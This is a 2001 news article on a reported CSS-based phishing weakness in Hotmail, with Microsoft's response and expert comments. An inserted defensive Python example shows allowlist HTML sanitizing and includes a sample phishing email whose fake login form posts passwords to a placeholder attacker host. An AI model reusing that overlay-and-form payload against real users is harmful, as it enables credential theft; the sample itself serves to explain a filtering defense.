Hotmail Users: Easy Prey for Hackers
NewsMax.com Wires
Sunday, Feb. 18, 2001
Microsoft Corp. says it plans an investigation into the security of its popular Hotmail, after a Canadian consulting firm warned of potential hacking attacks that could threaten 74 million users.

In a statement on Friday, Microsoft (stock: MSFT) said it intended to look into the possibility of security cracks that the consulting firm, Neurocom, said it detected earlier in the week in the Hotmail program.

"Microsoft is moving forward on the investigation with all due speed and, when it is completed, we will take the appropriate action," the company said.

Exactly what that remedy might be, the software titan said, is still unclear. Microsoft said it first learned of the new claims of security lapses in the e-mail program through "news channels," and contacted Neurocom to "learn more about this alleged vulnerability."

"They have not yet responded to our repeated requests for technical details," the Microsoft statement said. "Without additional information, we cannot say whether there is or isn't a vulnerability here."

Grégory Duchemin, an ethical hacker with Neurocom, apparently found the security hole earlier this week.

"We had not contacted Microsoft, but they got in touch with us," said Rosy Zaour, a Neurocom spokeswoman. "However, they haven't followed up on confirming the information yet."

Neurocom said that, by using cascading style sheets (CSS), hackers could easily replicate the look and feel of Web-based mail packages, leaving the user unaware that anything is wrong.

CSS is a standardized tool used by most website designers to simplify the means by which browsers lay out and display complex Web pages.

By exploiting features of CSS, the offending e-mail message can manufacture a login screen that appears identical to the real Hotmail login, but which sends the login information—including password—to the hacker's server.

According to a statement from Neurocom, "a hacker will use a Trojan horse written in HTML language and having for result [sic], when opening the mail, to recover the totality of the [browser] screen and to display the perfect replica of Hotmail's re-login page.

"The users' passwords for these kinds of services are all susceptible to being discovered thanks to this technique," Neurocom said.

Security engineer Mark Kadrich, the former principal consultant for INS Security, said the trick "is a directed attack, in that the exploit is buried as an attachment within an e-mail message."

Microsoft fixed what it called "similar sounding" problems with Hotmail in December. Yet the company is concerned that Neurocom went ahead and publicized the weakness even after the fix was made.

So, how can users employ filtering mechanisms to prevent such incursions?

"The right way to implement a filtering system is to have a list of good HTML syntax, and only allow those tags in instead of trying to filter out known bad things," said Elias Levy, CTO of securityfocus.com, a security consulting firm.
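The allowlist approach Levy describes, applied to the CSS-overlay message the article outlines, as an added example that is not code from the article, Neurocom or Microsoft. The tag list, the `denylist_filter` comparison and the sample message (with a placeholder `attacker.invalid` host) are all assumptions made for illustration.

```python
import re
from html import escape
from html.parser import HTMLParser

# Allowlist of tags a webmail renderer may keep. Anything unlisted (style
# attributes, <style>, <form>, <input>) is dropped, so no message can paint a fake login.
ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "ul", "ol", "li", "a"}
DROP_WITH_CONTENT = {"script", "style", "form", "iframe", "object"}  # inner text goes too

class AllowlistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__()
        self.out, self.skip = [], 0   # skip > 0 while inside a dropped element
    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip += 1
        elif not self.skip and tag in ALLOWED_TAGS:
            kept = ""
            for name, value in attrs:  # only <a href="http(s)://..."> survives; style/on* vanish
                if tag == "a" and name == "href" and value and re.match(r"https?://", value, re.I):
                    kept += f' {name}="{escape(value)}"'
            self.out.append(f"<{tag}{kept}>")
    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip = max(0, self.skip - 1)
        elif not self.skip and tag in ALLOWED_TAGS and tag != "br":
            self.out.append(f"</{tag}>")
    def handle_data(self, data):
        if not self.skip:
            self.out.append(escape(data, quote=False))

def sanitize(html_doc):
    p = AllowlistSanitizer()
    p.feed(html_doc)
    p.close()
    return "".join(p.out)

def denylist_filter(html_doc):
    """The 'strip known bad things' approach: removes <script> blocks only."""
    return re.sub(r"(?is)<script\b.*?</script>", "", html_doc)

# Constructed sample (not from the article): a stylesheet hides the mailbox, a positioned
# block covers the viewport and carries a fake login form posting to a placeholder host.
TROJAN_MAIL = (
    "<style>.mailbox{display:none}</style><p>Hi!</p>"
    '<div style="position:absolute;top:0;left:0;width:100%;height:100%">'
    '<form action="http://attacker.invalid/collect" method="post">'
    'Password: <input type="password" name="pw"><input type="submit"></form></div>'
    '<a href="https://example.com/">ok</a>'
)
```

Run `sanitize(TROJAN_MAIL)` and only the paragraph and the plain link remain, while `denylist_filter` leaves the positioned block and the form untouched because neither is on its list of known bad things.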

"It's a good trick," said Rick Steinberger, technical director of SecurityPortal.com, a security website. "There's nothing that says how widespread this is, but my guess would be that this has some potential to take off. It's violating the privacy of those people, and you could imitate them or delete their e-mail."

Steinberger said users need to be smart about potential attacks.

"This is not that different from the Anna Kournikova virus," he said, "in that it gets people to do something unwise. A lot of people are not terribly sophisticated about their interaction on the Internet."

Rafael Feitelberg, CEO of security solutions provider Gilian Technologies, Redwood Shores, Calif., believes the type of exploit that plagues Hotmail theoretically could affect any website that utilizes a login page or a data input form.

But ordinary security software, Feitelberg stated, wouldn't be able to detect such a spoof as it was happening, because the site being spoofed is not the one sending out the false login page.

Copyright (C) 2001 CMP Media Inc.

All Rights Reserved © 2009 NewsMax.Com